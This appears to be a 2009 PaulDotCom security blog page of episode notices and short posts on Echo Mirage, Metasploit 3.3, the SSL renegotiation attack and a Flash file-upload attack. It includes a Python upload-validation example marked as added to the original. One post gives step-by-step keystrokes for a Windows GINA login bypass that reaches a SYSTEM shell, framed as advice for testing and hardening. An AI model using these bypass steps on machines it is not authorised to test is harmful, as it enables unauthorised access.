This is where we as the security community need to start preparing for the next generation of Malware today.  Ask yourself, if you encountered a strange executable that was not flagged by AV how would you approach it?  We have covered tools like Volatility to look at the memory on a system.  But what about data on the network?  If an attacker is encrypting their traffic it may make it difficult to ascertain what they are doing, what they have done, and what their goals are.

To help this I would like to introduce you to a tool called Echo Mirage.
This is just another excellent tool from the folks at Bindshell.net.


The reason tools like this are critical is that we need to have the ability to see inside encrypted channels. This tool allows you to see (and edit!!) the data being sent and received within an SSL session. It also does a great job of looking at unencrypted traffic as well... but you could just use Wireshark for that.

- strandjs



John Strand will be teaching SANS Network Penetration Testing in
London from 11/30 to 12/6 2009, and SANS hacker techniques and Incident Response in New Orleans from 01/10/10 till 01/18/10.

Day after Thanksgiving: Hoff Friday


What better way to emerge from your (Wild) Turkey stupor than to join the PDC crew and guest Christofer Hoff live at 20:30 EST on Friday November 27th for Episode 177 of PaulDotCom Security Weekly! We promise not to ask you to pass the gravy or overstay our welcome in exchange for your agreement to not Hassle the Hoff.

log-hoff.jpg

As a special treat, the PDC crew will be recording from Larry's barn! At least, Larry told us it's his barn (Social Engineering paranoia sets in after a while & we begin to question just about everything these days).

The live stream should be active around 8:30 EST, Friday night. Please keep in mind that the recording start time is dependent on the amount of tryptophan in our blood streams.

For bonus effect, join the IRC channel during the stream - we can take live comments and discussion from the channel! Find us on IRC at irc.freenode.net #pauldotcom.

When active, the live stream(s) can be found at:

PaulDotCom Livestream - All new with Video and Chat!

PaulDotCom Icecast Radio

Please join us, enjoy the show live, and thanks for listening!

- Paul, Carlos, Mick, Larry, John, & Darren.

PaulDotCom Security Weekly - Episode 176 Video


In case you missed it, we are recording the live video from the shows and re-releasing them. This is still in the experimental phases, but I hope everyone enjoys! If the feedback is positive we will do this for each episode and incorporate more video-friendly elements.

Full Show Notes

Hosts: Larry "HaxorTheMatrix" Pesce, Paul "PaulDotCom" Asadoorian, John Strand, Mick Douglas, Carlos "Dark0perator" Perez

Part 1:

"In Part one of the episode we interview the CTO of Cenzic, Lars Ewe. Paul butchers the pronunciation of his last name, but Lars sticks around to talk shop, discuss web application vulnerabilities, same origin policies, and the recent controversy over the latest trends report."

Part 2:

"Paul talks about building a security lab on the cheap, and a SPECIAL GUEST APPEARANCE!!!"


PaulDotCom Security Weekly - Episode 176 Part 1 - November 19, 2009


In Part one of the episode we interview the CTO of Cenzic, Lars Ewe. Paul butchers the pronunciation of his last name, but Lars sticks around to talk shop, discuss web application vulnerabilities, same origin policies, and the recent controversy over the latest trends report.

choosewirelessnetwork.png

Full Show Notes

Direct Audio Download

Hosts: Larry "HaxorTheMatrix" Pesce, Paul "PaulDotCom" Asadoorian, John Strand, Mick Douglas, Carlos "Dark0perator" Perez

Audio Feeds:

MSGINA.DLL is a dynamic link library called by the Winlogon process that is responsible for presenting the user with the familiar Windows login prompt. There are MANY third party systems on the market today that either replace MSGINA or insert themselves into the login process using "GINA chaining". Examples of such products include most password self service systems, biometric and other two factor authentication systems, and VPN clients that establish your network connection before the normal login process occurs.

Recent experience has led me to believe that many of these systems may be vulnerable to authentication bypass attacks. You walk up to the machine and, without entering any username or password, you have full access to the computer. In this image (IMAGE1) you see a screenshot taken from a system that suffers from just such a problem.


[IMAGE1]

Although the Windows login prompt generated by the vendor GINA is still on the screen, we are able to get a full interactive desktop and, as the name on the Start Menu illustrates, we are running under the all-powerful SYSTEM account. How could this happen? Easy: when software developers either replace or chain Microsoft's MSGINA.DLL, they have to be very careful to restrict what the user can do within their new GINA. A permissive GINA gives an unauthenticated user full access to the machine. For example, last month Tyler Spivey found a bypass in "JAWS". JAWS is a screen reader application for the visually impaired. You can read about what Tyler found here.

Similarly, if you have a password self-service system that replaced your GINA with a new GINA that includes a "Forgot Password" button, you may have a problem. Imagine that the Forgot Password button launches a web browser that takes the user to a website where they can reset their password. Imagine further that the GINA developers simply used a Visual Studio browser object based on Internet Explorer when developing their GINA. If they do not prevent the user from viewing the source of the website (Right-Click -> View Source), an attacker is given access to NOTEPAD.EXE. From there an attacker simply has to select "FILE->OPEN", browse to "C:\WINDOWS\SYSTEM32\CMD.EXE", right-click on it and select "OPEN" to get a command prompt WITHOUT logging in to the system. What's more, if the attacker wants a full interactive desktop they can simply type "START USERINIT" from the command prompt to launch the normal Windows process that gives them their desktop. The developer may have thought to disable the right-click functionality that allows you to view source, but overlooked keyboard combinations that do the same, such as SHIFT-F10, CONTROL-SHIFT-F10, ALT-SHIFT-F10, etc. The end result is that doing a GINA replacement securely isn't easy; there are a lot of opportunities for error. After I mentioned these types of attacks in a SANS 401 class I taught in Charleston, one of the students checked and discovered a similar bypass in a GINA replacement they use at work. Do you have a GINA replacement? Take a few minutes to check it out; you may be surprised by what you find.

Here are some tips when considering a GINA replacement product:

1) Don't. Avoid it if you can.
2) If you must, use GINA chaining instead of a full replacement. A full GINA replacement must reproduce all the informative screens in MSGINA.DLL, including "Now Applying Group Policy Settings" and "Installing 1 of 400 software patches and shutting down, DO NOT POWER OFF". A GINA that fails to implement these important screens will likely result in impatient users powering off machines during software updates and corrupting their OS installations.
3) Thoroughly test the GINA by going through EVERY screen, paying special attention to keyboard shortcuts, to see if you can get a standard Windows File dialog box. If you can, you've got trouble.
4) For Vista and later, consider using systems that use Microsoft's hybrid credential provider APIs rather than a GINA replacement. Does this solve the problem? Probably not; I think developers can still build unsecured login processes, but I liken it to using parameterized SQL statements as opposed to building SQL statements by hand and executing them. The rigor enforced by the API calls gives you a better chance of success.

As always, practice responsible disclosure (Image2)

[Image2]

-Mark Baggett

Still think allowing users to upload files to your server is OK?

There has been quite a bit of buzz surrounding the newest Flash attack. Please review this site for a quick write-up. I want to make it clear this attack vector is different than a remote vulnerability in Flash. This attack is focused on an individual uploading a flash file to a server and then having it execute when a user visits the site.

Adobe has a nice write-up out lining the issue and their initial response to the problem here. I really like the write-up and the quote of a core axiom of computer security: "If you allow a bad guy to upload programs to your web site, it's not your web site anymore." That is very true.

However, in the article they re-state that the issue at hand is the Same Origin Policy issue. Mike Bailey of Foreground Security neatly breaks down where the Adobe response fails to completely address the issue here.

The point he makes is that Adobe draws similarities between JavaScript and SWF files. He shows that this comparison has some very interesting limitations. First, simply uploading a .js file to a web server does not mean the file can be executed. However, if someone were to upload a .swf file to the server, it can be executed within the context of the server. Now, here is where it gets interesting: if a user uploads a .swf file to a server and changes the extension, it can still execute within the context of the server. Who thought this was a good idea?

His point is that the scenarios in which .swf files can be executed are far more pervasive than the .js counterparts that Adobe discusses.

The reason this fascinates me is that it is outside the bounds of what penetration testers would normally look for in a web application. Because this attack vector is not a remote exploit, it does not get the buzz that it deserves. The point is that when we are testing we need to look for vulnerabilities and attacks that attackers would use. This attack vector is definitely in that category. Further, this is not something that is easily fixed with a patch.

There are two things we need to take from this. First, file upload attacks have to be in your arsenal. Second, from the defensive side, Adobe is right. As much as I would like to disagree with the technical aspects of their response to this vulnerability, they are correct. If you design your web infrastructure to allow file uploads and for those uploads to be executed, there are going to be serious security ramifications. What would be the alternative? Adobe could try to fix the Flash plugin to at least validate file extensions before executing, or possibly require the content-type headers in the HTML (not in the file) before executing the Flash, thus bringing it more in line with the JavaScript analogy they discussed in their write-up.

Until they do (and I don't expect this to happen any time soon) we will have a new vector to test for in our engagements.
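As an added defensive example (not code from the original post, from Adobe, or from Foreground Security), here is a server-side upload check in Python that decides by file content rather than by extension, so the renamed-.swf case above is rejected; the allowed-type table, the sample bodies and the response headers are constructed for this example.

```python
import os

# SWF header magic: "FWS" (uncompressed), "CWS" (zlib-compressed), "ZWS" (LZMA,
# added in later Flash versions). The plugin keys on this header, not the name.
SWF_MAGIC = (b"FWS", b"CWS", b"ZWS")

# Types this hypothetical site intends to accept: extension -> (magic bytes, MIME)
ALLOWED_TYPES = {
    ".png": ((b"\x89PNG\r\n\x1a\n",), "image/png"),
    ".jpg": ((b"\xff\xd8\xff",), "image/jpeg"),
    ".gif": ((b"GIF87a", b"GIF89a"), "image/gif"),
}


def looks_like_swf(data: bytes) -> bool:
    """True if the leading bytes form an SWF header, whatever the file is called."""
    return len(data) >= 8 and data[:3] in SWF_MAGIC


def check_upload(filename: str, data: bytes):
    """Return (accepted, reason). The extension is checked, but the content decides."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_TYPES:
        return False, "extension %r is not on the allow-list" % ext
    if looks_like_swf(data):
        # The renamed-.swf case from the post: the name says image, the bytes say Flash.
        return False, "content is a Flash (SWF) file despite the %s extension" % ext
    magics, _ = ALLOWED_TYPES[ext]
    if not any(data.startswith(m) for m in magics):
        return False, "content does not match the declared %s type" % ext
    return True, "ok"


def serve_headers(filename: str) -> dict:
    """Headers for serving an accepted upload: the validated type, no browser
    sniffing, and download rather than inline rendering. Serving uploads from a
    separate domain (not shown here) additionally keeps them out of the site's origin."""
    ext = os.path.splitext(filename)[1].lower()
    return {
        "Content-Type": ALLOWED_TYPES[ext][1],
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": 'attachment; filename="%s"' % os.path.basename(filename),
    }


# Constructed sample bodies (not real files): a minimal SWF header and a PNG header.
FAKE_SWF = b"FWS\x08" + (40).to_bytes(4, "little") + b"\x00" * 32
FAKE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32

if __name__ == "__main__":
    for name, body in (("avatar.png", FAKE_SWF), ("avatar.png", FAKE_PNG), ("clip.swf", FAKE_SWF)):
        print(name, check_upload(name, body))
```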

-strandjs



John Strand will be teaching SANS Network Penetration Testing in London from 11/30 to 12/6 2009, and SANS Hacker Techniques and Incident Response in New Orleans from 01/10/10 till 01/18/10.

Episode 176 Live Streaming Notice


Witness first hand the hackalicious bomb which the PaulDotCom (PaulDotBomb?) crew drops on a weekly basis! Join us live at 19:30 EST on Thursday November 19th for Episode 176 of PaulDotCom Security Weekly, where Lars Ewe kindly offers to hack your website, for free, no less!


Furthermore, Mr. PaulDotCom proudly presents "Setting up your very own hacking lab", in which Paul will walk you through easy ways to acquire web applications, software and vulnerable operating systems.

The live stream should be active around 7:30 EST, Thursday night. Please keep in mind that the recording time start is dependent on the length of fuse we've rolled out.


Please join the IRC channel during the stream - we can take live comments and discussion from the channel! Find us on IRC at irc.freenode.net #pauldotcom.

When active, the live stream(s) can be found at:

PaulDotCom Livestream - All new with Video and Chat!

PaulDotCom Icecast Radio

Please join us, enjoy the show live, and thanks for listening!

- Paul, Carlos, Mick, Larry, John, & Darren.

Metasploit 3.3 released!


Get it here!

There are a couple of very cool things in this release. First, there are now standalone installs for Windows and Linux. This is a nice feature in light of some of the recent conflicts between Ruby versions and the framework.

Another feature that I like is the ability to embed payloads into other .exe files. The OSVDB references are also very nice when it comes time to write reports. NX support in payloads will be a big help.

There is quite a lot to review/take in. Check out the full release notes here.

Expect a full review/discussion on our next show!!

All I can say is bring on 3.4 dev!

-strandjs

I was just kicking around the ridiculous speed at which the new SSL vulnerability went from academic curiosity to exploit demonstration. For those of you who are catching up, this is not the Moxie stuff. The new attack allows you to insert arbitrary text at the beginning of an SSL or TLS session. At first, many researchers thought this was interesting but did not see it as a very effective attack in the real world. Then Anil Kurmus came along and demonstrated how this attack can be used to steal credentials from Twitter. This attack was successful because of the very nature of the Twitter API. I would love to spend some time poking around to see how many other attack vectors there are for this.

There are a few things we need to take from this. First, obscure/novel attacks don't stay that way for long. We need to pay very close attention to any new attack that comes out that targets the very core protocols we use every day. Second, don't take any level of security, provided by various "secure" protocols, for granted. It is simply a matter of time before someone cracks them wide open. Finally, I read that initially some vendors were getting together in secret to look into how to fix this vulnerability. This sucks. I understand the need for vendors to get a head start, but the infosec community lives and breathes on information. There have been some serious attacks on the underlying infrastructure of how we do business every day: From Dan's DNS attacks, to BGP prefix attacks, and to the work that Moxie has done. This is just another attack on what we consider to be secure.

The point is to never make assumptions about how secure a particular component of your infrastructure is. It is just a matter of time before someone drives a Kenworth through it. If one attack to something like SSL compromises your entire security architecture, then your security architecture sucks.



What said truck might look like...

-strandjs


PaulDotCom Security Weekly - Episode 175 - November 12, 2009


The PaulDotCom crew talks about DNS enumeration, network packet analysis with Xplico, spilled COFEE, Pwning your own ATM machine, and more!


Full Show Notes

Direct Audio Download

Hosts: Larry "HaxorTheMatrix" Pesce, Paul "PaulDotCom" Asadoorian, John Strand, Mick Douglas, Carlos "Dark0perator" Perez


PaulDotCom Security Weekly - Episode 174 Part 2 - November 5, 2009


Larry finishes up a tech segment on Mass 0wnage with Jasager and complementary tools, and we discuss the stories of the week, including why MS Patch Tuesday is a bad idea and tons of other hacks, tips, tricks, and security fail.


Full Show Notes

Direct Audio Download

Hosts: Larry "HaxorTheMatrix" Pesce, Paul "PaulDotCom" Asadoorian, John Strand, Mick Douglas, Carlos "Dark0perator" Perez


PaulDotCom Security Weekly - Episode 175 - Nov. 12th, 2009


Tonight at 20:30 EST (8:30 PM), Mick Douglas promises a Swine-Flu-free technical segment on Network Packet Analysis. The crew then discusses the latest computer security news, such as the worldwide jailbroken iPhone pwnage and much more!


When active, the live stream(s) can be found at:

PaulDotCom Livestream - All new with Video and Chat!

PaulDotCom Icecast Radio

Please join us, enjoy the show live, and thanks for listening!

- Mick, Larry, John, Darren, Carlos, & Paul.

PaulDotCom Security Weekly - Episode 174 Part 1 - November 5, 2009


The PaulDotCom crew interviews Ethan Galstad, the founder of the Nagios open source project!


Full Show Notes

Direct Audio Download

Hosts: Larry "HaxorTheMatrix" Pesce, Paul "PaulDotCom" Asadoorian, John Strand, Mick Douglas, Carlos "Dark0perator" Perez


PaulDotCom Security Weekly - Episode 173 Part 2 - October 29, 2009


The sock puppets talk about letting your users access the Internet, bad Internet users, bad!


Full Show Notes

Direct Audio Download

Hosts: Larry "HaxorTheMatrix" Pesce, Paul "PaulDotCom" Asadoorian, John Strand, Mick Douglas, Carlos "Dark0perator" Perez


Join us live at 7:30 EST tonight for Episode 174 of PaulDotCom Security Weekly, where Larry and Darren finish off their Trilogy of Pwnage with the LaFonera and we discuss the network monitoring tool Nagios with its founder, Ethan Galstad. The live stream should be active around 19:30 EST tonight.
Paris loves Linux, you should too.

Please join the IRC channel during the stream - we can take live comments and discussion from the channel! Find us on IRC at irc.freenode.net #pauldotcom.

When active, the live stream(s) can be found at:

PaulDotCom Livestream - All new with Video and Chat!

PaulDotCom Icecast Radio

Please join us, enjoy the show live, and thanks for listening!

- Darren, Mick, John, Paul, Carlos, & Larry.

PaulDotCom Security Weekly - Episode 173 Part 1 - October 29, 2009


Paul, Larry, John, Mick, and Carlos are joined by a wide array of guests, including Anthony Jacobin (talking about Barcrawl, a tool for scouring pastebin for interesting stuff), the entire Security Justice crew, Jack Daniel, and last, but not least (at least that's what we tell him), intern Darren!


Full Show Notes

Direct Audio Download

Hosts: Larry "HaxorTheMatrix" Pesce, Paul "PaulDotCom" Asadoorian, John Strand, Mick Douglas, Carlos "Dark0perator" Perez
